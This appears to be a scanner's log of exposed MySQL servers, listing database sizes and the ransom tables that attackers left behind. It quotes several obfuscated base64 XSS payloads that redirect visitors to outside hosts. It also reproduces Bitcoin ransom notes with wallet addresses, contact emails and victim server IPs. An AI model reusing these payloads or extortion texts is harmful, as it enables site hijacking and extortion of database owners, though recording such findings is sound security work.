+plugin:MysqlOpenPlugin -country:"South Korea" -ip:"49.232.0.0/14" +plugin:"MysqlOpenPlugin" -net:"Hangzhou Alibaba Advertising Co.,Ltd." +asn:"14061"
Databases: 63, row count: 4399, size: 2.8 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv with...
Ransom notes :
<body/onload=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LnRvcHJldmVudWVnYXRlLmNvbS9jbmN0d2pkbj9rZXk9NzU0YTVmZGE2Mjk1N2M4MDc1NzdiOTEyYmFiOThlYzYiKQ=="))>
Found by MysqlOpenPlugin
Databases: 42, row count: 3921, size: 2.5 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv with...
Ransom notes :
<body/onload=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp"))>
Found by MysqlOpenPlugin
Databases: 45, row count: 147283, size: 23.1 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table db.chat with 0 recor...
Ransom notes :
<body/onload=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp"))>'"><meta/http-equiv="refresh"content="1;URL=https://t.ly/a7RLC"/>
Found by MysqlOpenPlugin
Databases: 32, row count: 141705, size: 7.9 MB
Found table README_TO_RECOVER_A.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv wi...
Ransom notes :
All your data is backed up. You must pay 0.017 BTC to 1DebBNt391tT5stk8YgtLJoAU8HPoRhbPD In 48 hours, your data will be publicly disclosed and deleted. (more information: go to http://iplis.ru/data2)
Found by MysqlOpenPlugin
Databases: 190, row count: 2407, size: 4.7 MB
Found table RECOVER_YOUR_DATA.RECOVER_YOUR_DATA with 2 records
Found table mysql.aahyyt with 1 reco...
Ransom notes :
All your data is backed up. You must pay 0.0120 BTC to 1HcZssLejAL33y2EyBqwk3ot2vAiUtkoLG In 48 hours, your data will be publicly disclosed and deleted. (more information: go to http://iplis.ru/data02)
Found by MysqlOpenPlugin
Databases: 172, row count: 195, size: 2.8 MB
Found table RECOVER_YOUR_DATA.RECOVER_YOUR_DATA with 0 records
Found table mysql.abnvxt32 with 1 rec...
Found by MysqlOpenPlugin
Databases: 32, row count: 134883, size: 7.8 MB
Found table README_TO_RECOVER_A.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv wi...
Ransom notes :
All your data is backed up. You must pay 0.0067 BTC to 1HcZssLejAL33y2EyBqwk3ot2vAiUtkoLG In 48 hours, your data will be publicly disclosed and deleted. (more information: go to http://iplis.ru/data02)
Found by MysqlOpenPlugin
Databases: 39, row count: 128382, size: 2.9 MB
Found table README_TO_RECOVER_TN.README with 1 records
Found table RECOVER_YOUR_DATA.README with 1...
Ransom notes :
1I have backed up all your databases. To recover them you must pay 0.006 BTC (Bitcoin) to this address: 18za7kgPKtPJ6vkHVL5EB8FQmA2doeKfHg . Backup List: RECOVER_YOUR_DATA. After your payment email me at dbrestore1049@onionmail.org with your server IP (134.209.152.117) and transaction ID and you will get a download link to your backup. Emails without transaction ID and server IP will be ignored. 18za7kgPKtPJ6vkHVL5EB8FQmA2doeKfHg 1I have backed up all your databases. To recover them you must pay 0.006 BTC (Bitcoin) to this address: 18za7kgPKtPJ6vkHVL5EB8FQmA2doeKfHg . Backup List: RECOVER_YOUR_DATA. After your payment email me at dbrestore1049@onionmail.org with your server IP (134.209.152.117) and transaction ID and you will get a download link to your backup. Emails without transaction ID and server IP will be ignored. 18za7kgPKtPJ6vkHVL5EB8FQmA2doeKfHg
Found by MysqlOpenPlugin
Databases: 25, row count: 2053, size: 571.7 kB
Found table README_TO_RECOVER_A.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv wi...
Ransom notes :
All your data is backed up. You must pay 0.018 BTC to 164hyKPAoC5ecqkJ2ygeGoGFRcauWRLujV In 48 hours, your data will be publicly disclosed and deleted. (more information: go to http://iplis.ru/data2)
Found by MysqlOpenPlugin
Databases: 31, row count: 142411, size: 7.8 MB
Found table mysql.columns_priv with 0 records
Found table mysql.db with 2 records
Found table mysq...
Found by MysqlOpenPlugin
Databases: 179, row count: 16020947, size: 3.6 GB
Found table box.abcampaign with 0 records
Found table box.abcampaign_template with 0 records
Fo...
Found by MysqlOpenPlugin
Databases: 40, row count: 138383, size: 7.9 MB
Found table README_TO_RECOVER_A.RECOVER_YOUR_DATA with 2 records
Found table ge104230_digiDevDB.RE...
Ransom notes :
All your data was backed up. You need to email us at rasmus+2vs4s@onionmail.org to recover your data. CHECK YOUR SPAM FOLDER! If you dont answer we will reach the General Data Protection Regulation, GDPR, 1I have backed up all your databases. To recover them you must pay 0.012 Bitcoin to this address: 18tdQxhKp82FjBhesXspCJsqaMKnSLafab. Backup list: ge104230_digiDevDB. After your payment email me at rdatabase.2104@onionmail.org with your server IP (188.166.78.235) and transaction ID. Emails without transaction ID will be ignored. 18tdQxhKp82FjBhesXspCJsqaMKnSLafab
Found by MysqlOpenPlugin
Databases: 73, row count: 148147, size: 12.9 MB
Found table README_TO_RECOVER_A.RECOVER_YOUR_DATA with 2 records
Found table db_main.batch with 1...
Ransom notes :
All your data is backed up. You must pay 0.03 BTC to 18224LViuRGEhqrUzeRLE9Y9ggogcdkNn5 In 48 hours, your data will be publicly disclosed and deleted. (more information: go to http://iplis.ru/data2)
Found by MysqlOpenPlugin
Databases: 32, row count: 136906, size: 7.8 MB
Found table RECOVER_YOUR_DATA.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv with...
Ransom notes :
All your data is backed up. You must pay 0.0120 BTC to 1M1bhRQLFnttrJFkY1RqN9UcCMvrB4MDbT In 48 hours, your data will be publicly disclosed and deleted. (more information: go to http://iplis.ru/data02)
Found by MysqlOpenPlugin
Databases: 70, row count: 415317, size: 283.9 MB
Found table app.action_events with 139 records
Found table app.aggregator_bot_telegram_chats wit...
Found by MysqlOpenPlugin
Databases: 36, row count: 140702, size: 7.9 MB
Found table RECOVER_YOUR_DATA.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv with...
Ransom notes :
All your data is backed up. You must pay 0.0115 BTC to 1GbLiucJ7fhsM3sYrPKHvZ5mUW2p4AYW7p In 48 hours, your data will be publicly disclosed and deleted. (more information: go to http://iplis.ru/data02)
Found by MysqlOpenPlugin
Databases: 39, row count: 143999, size: 7.9 MB
Found table mysql.columns_priv with 0 records
Found table mysql.component with 0 records
Found tab...
Found by MysqlOpenPlugin
Databases: 99, row count: 137299, size: 9.1 MB
Found table laravel.editor_promotion_event_applicants with 0 records
Found table laravel.editor_pr...
Found by MysqlOpenPlugin
Databases: 32, row count: 137324, size: 7.8 MB
Found table README_TO_RECOVER_A.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv wi...
Ransom notes :
<body/onload=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp"))>
Found by MysqlOpenPlugin
Databases: 70, row count: 2846, size: 3.0 MB
Found table PLEASE_READ_ME_XMG.warning with 2 records
Found table mysql.agssmz32 with 0 records
Foun...
Ransom notes :
1Hello,
I am a security researcher from Sweden,
having interest on web security and other focus areas.
Your database was breached by a 3rd party and files were backed up
to their cloud hosting storage.
I accidently discovered this dedicated cloud storage and was able to secure the files.
It is scheduled to be sold online.
The short-term consequences of this data leak could be fees, fines and frustration.
To prevent this i will remove all files from online storage above
and restore the database if needed.
please send exactly 0.1 bitcoin (BTC) to the following
bitcoin address: 1PsTLWABfyig6NaEHhzQBZX8ENigxRr998
Contact by email one hour after payment complete: 2a9c9b86045c@mailinator.com
include this incidentId: be63210d-8657-4b74-833f-84eeff07c4d8
I will email you the link to download the original
binary dump file created with mysql mydumper
I will also shred remove any files and terminate the cloud hosting account.
Found by MysqlOpenPlugin